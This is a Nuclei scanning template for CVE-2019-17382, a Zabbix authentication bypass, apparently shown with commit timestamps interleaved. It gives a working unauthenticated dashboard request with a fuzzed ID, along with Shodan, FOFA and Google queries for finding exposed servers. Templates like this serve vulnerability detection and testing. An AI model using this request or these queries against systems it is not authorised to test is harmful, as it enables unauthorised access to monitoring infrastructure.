2021-01-02 04:59:06 +00:00
id : CVE-2019-17382
2020-07-07 04:17:27 +00:00
info :
2022-05-17 09:11:26 +00:00
name : Zabbix <=4.4 - Authentication Bypass
2021-06-09 12:20:56 +00:00
author : harshbothra_
2020-08-31 18:34:29 +00:00
severity : critical
2022-05-17 09:11:26 +00:00
description : Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/47467
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
2023-08-31 11:46:18 +00:00
- https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html
2024-01-29 17:11:14 +00:00
- https://github.com/huimzjty/vulwiki
- https://github.com/merlinepedra25/nuclei-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 9.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-17382
cwe-id : CWE-639
2024-06-07 10:04:29 +00:00
epss-score : 0.3552
epss-percentile : 0.97136
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 100
2023-07-11 19:49:27 +00:00
vendor : zabbix
product : zabbix
2024-06-07 10:04:29 +00:00
shodan-query :
- http.favicon.hash:892542951
- http.title:"zabbix-server"
- cpe:"cpe:2.3:a:zabbix:zabbix"
fofa-query :
- icon_hash=892542951
- app="zabbix-监控系统" && body="saml"
- title="zabbix-server"
2024-05-31 19:23:20 +00:00
google-query : intitle:"zabbix-server"
2024-03-19 15:20:31 +00:00
tags : cve2019,cve,fuzz,auth-bypass,login,edb,zabbix
2020-07-07 04:17:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-22 18:09:33 +00:00
- raw :
2021-04-24 03:59:34 +00:00
- |
2021-04-26 14:35:45 +00:00
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
2021-04-24 03:59:34 +00:00
Host : {{Hostname}}
2020-07-07 04:17:27 +00:00
2021-08-22 18:09:33 +00:00
payloads :
ids : helpers/wordlists/numbers.txt
2021-09-02 11:59:10 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2020-07-07 06:26:01 +00:00
matchers-condition : and
2020-07-07 04:17:27 +00:00
matchers :
2022-05-17 09:11:26 +00:00
- type : word
words :
- "<title>Dashboard</title>"
2021-10-10 01:13:30 +00:00
2020-07-07 04:17:27 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100b100ab9974bd16719860f013afc3fe8a9b09da541e2df13756dc7ac620cd480f02210080d1fc3247458331b51cf1b884db94afe5b40f5dd4258b168a7569927a66ef62:922c64590222798bb761d5b6d8e72950
